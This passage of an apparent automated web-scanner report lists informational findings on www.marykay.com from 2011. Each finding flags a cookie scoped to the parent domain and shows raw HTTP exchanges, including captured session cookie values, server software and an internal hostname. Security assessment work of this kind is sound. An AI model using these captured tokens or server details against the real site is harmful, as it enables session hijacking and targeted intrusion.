The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /JS/swfobject.js HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 6902
Content-Type: application/x-javascript
Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT
Accept-Ranges: bytes
ETag: "070ef5621cc1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=CCA92511426CCAC77EAB528D54BE529A; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

/**
* SWFObject v1.4.4: Flash Player detection and embed - http://blog.deconcept.com/swfobject/
*
* SWFObject is (c) 2006 Geoff Stearns and is released under the MIT License:
* http://www.open
...[SNIP]...

12.90. http://www.marykay.com/Menu.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Menu.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=69ED8CC0428ECB34AD8AD5AB8137F4A2; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Menu.css HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 4421
Content-Type: text/css
Last-Modified: Thu, 02 Jun 2011 09:18:09 GMT
Accept-Ranges: bytes
ETag: "809efefc521cc1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=69ED8CC0428ECB34AD8AD5AB8137F4A2; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

.commentfix{}
/* These styles contain RARELY CHANGED rules used when the Menu control adapter is enabled. */
/* These rules correspond to the "pure CSS menu" technique that have been evolving over t
...[SNIP]...

12.91. http://www.marykay.com/Scripts/HeaderScript.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Scripts/HeaderScript.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=2DE4171146CE3D4441DE1B8AB44DB9C4; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Scripts/HeaderScript.js HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1283
Content-Type: application/x-javascript
Last-Modified: Wed, 06 Apr 2011 17:12:25 GMT
Accept-Ranges: bytes
ETag: "80e28bcc7df4cb1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=2DE4171146CE3D4441DE1B8AB44DB9C4; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:47 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

...var headID = document.getElementsByTagName("head")[0];
if (typeof jQuery == 'undefined') {
//alert("Jquery not present");
var newScriptJQuery = document.createElement('script');
new
...[SNIP]...

12.92. http://www.marykay.com/Scripts/jquery-1.4.2.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Scripts/jquery-1.4.2.min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=C45F6C2F49D028674DB98F82BB89FB3E; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Scripts/jquery-1.4.2.min.js HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BA53BB5644EB3C70267713937AE89A33; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 38069
Content-Type: application/x-javascript
Last-Modified: Wed, 06 Apr 2011 17:12:25 GMT
Accept-Ranges: bytes
ETag: "80e28bcc7df4cb1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=C45F6C2F49D028674DB98F82BB89FB3E; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:48 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

/*!
* jQuery JavaScript Library v1.3
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2
...[SNIP]...

12.93. http://www.marykay.com/Styles.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Styles.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Styles.css HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 14259
Content-Type: text/css
Last-Modified: Wed, 10 Aug 2011 07:14:08 GMT
Accept-Ranges: bytes
ETag: "0e050182d57cc1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

/*******************************************************************************************************************\
* Global Styles
...[SNIP]...

12.94. http://www.marykay.com/Styles_US.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Styles_US.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=4162573847264D86536F4E90C80EA38A; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Styles_US.css HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 23822
Content-Type: text/css
Last-Modified: Thu, 02 Jun 2011 09:18:10 GMT
Accept-Ranges: bytes
ETag: "03597fd521cc1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=4162573847264D86536F4E90C80EA38A; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

/*******************************************************************************************************************\
* Global Styles
...[SNIP]...

12.95. http://www.marykay.com/Themes/TabMenu/US/tabs.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Themes/TabMenu/US/tabs.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=6F98459542F76D915AA05BB75B891338; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Themes/TabMenu/US/tabs.css HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 0
Content-Type: text/css
Last-Modified: Wed, 06 Apr 2011 17:12:30 GMT
Accept-Ranges: bytes
ETag: "7970d2cf7df4cb1:d8226"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=6F98459542F76D915AA05BB75B891338; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

12.96. http://www.marykay.com/Themes/TabMenu/tabs.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Themes/TabMenu/tabs.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=A5B951464DDB4DF25E342EB344BDA973; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Themes/TabMenu/tabs.js HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 14231
Content-Type: application/x-javascript
Last-Modified: Wed, 06 Apr 2011 17:12:28 GMT
Accept-Ranges: bytes
ETag: "0a655ce7df4cb1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=A5B951464DDB4DF25E342EB344BDA973; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

var delay = 1000;
var seltab = null;
var prevtab = null;
function tabs_init(id)
{
   seltab = document.getElementById(id);
   showTab(seltab, false);
}
function hideMenu(menu)
{
   if (menu != nul
...[SNIP]...

12.97. http://www.marykay.com/content/HPflash/portfolio_mk.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/content/HPflash/portfolio_mk.xml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=19C9D0014D75852EFB8C9087C106B6A5; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/HPflash/portfolio_mk.xml HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 316
Content-Type: text/xml
Last-Modified: Wed, 31 Aug 2011 14:47:25 GMT
Accept-Ranges: bytes
ETag: "8bceaae5ec67cc1:d825c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=19C9D0014D75852EFB8C9087C106B6A5; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:52 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:53 GMT; path=/

<?xml version="1.0" ?>
<portfolio>
   <picture thumb    = "/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg"/>
   <picture thumb    = "/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg"/>
   <picture thumb    = "/CONTE
...[SNIP]...

12.98. http://www.marykay.com/content/hpflash/stage.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/content/hpflash/stage.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=9326E0864457B586C81FDD8CE24A23E5; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/hpflash/stage.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 41607
Content-Type: application/x-shockwave-flash
Last-Modified: Fri, 03 Jun 2011 15:46:18 GMT
Accept-Ranges: bytes
ETag: "a318661522cc1:d8265"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=9326E0864457B586C81FDD8CE24A23E5; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:50 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:51 GMT; path=/

CWS..i..x...wTS..(<IH..1T..@..t.I..$...(J7A......%... .!tAQ..("(.X "*6., v.
......w....?..u....={f~.M......P..@.....q@OLL..-F.>.......:.....`=3j.[X.....8`.)..`o4j.X.....e.^....".ak.....`....QA...o...
...[SNIP]...

12.99. http://www.marykay.com/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/default.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=A79DE10345855E54FDA05590CB54614B; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.100. http://www.marykay.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=43433491401355FE92B1C286F65FC316; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=921B020F47FD8A57A88269A775E750F4; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 318
Content-Type: image/x-icon
Last-Modified: Wed, 06 Apr 2011 17:12:18 GMT
Accept-Ranges: bytes
ETag: "b9ed3c87df4cb1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=43433491401355FE92B1C286F65FC316; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:57 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:58 GMT; path=/

..............(.......(....... ....................................3...f...f...........................$...........\......m...wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwEwWtgEwFDu.rw4sWds%bwDDwtBtDwAGwt.
...[SNIP]...

12.101. http://www.marykay.com/images/fflogo.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/images/fflogo.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=BCE7DC82466E2D42565B29A3B3C4E9C6; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/fflogo.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1665
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT
Accept-Ranges: bytes
ETag: "8b6f46621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=BCE7DC82466E2D42565B29A3B3C4E9C6; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:48 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

............................................................................................................J..
...[SNIP]...

12.102. http://www.marykay.com/images/icn_ec.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/images/icn_ec.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=242A48734AE8C90326B538806CDF19D0; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icn_ec.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1712
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT
Accept-Ranges: bytes
ETag: "17d0446621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=242A48734AE8C90326B538806CDF19D0; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:48 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

..........................................................................................................$.Z..
...[SNIP]...

12.103. http://www.marykay.com/images/icn_fb.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/images/icn_fb.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=8AA5E3834817F20E05D692A6C10BEF9D; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icn_fb.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1769
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT
Accept-Ranges: bytes
ETag: "bbc506621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=8AA5E3834817F20E05D692A6C10BEF9D; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:48 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

.PNG
.
...IHDR...z...$........4....gAMA......a.....tEXtSoftware.Adobe ImageReadyq.e<...{IDAThC.Z.oTE...mL0!.?@q%.*... H"./h.W..D..l..}hY.(R............D....1-,&m.~....g......Z......3gf.............
...[SNIP]...

12.104. http://www.marykay.com/images/icn_pbp.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/images/icn_pbp.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=171587244A3CE521A7BA37AE883107B1; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icn_pbp.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 2351
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT
Accept-Ranges: bytes
ETag: "d380556621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=171587244A3CE521A7BA37AE883107B1; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:49 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/

......JFIF.....`.`.....4Exif..II*.......1...............Adobe ImageReady.....C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!22222222222222222222222222222222222222
...[SNIP]...

12.105. http://www.marykay.com/images/icn_vmo.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
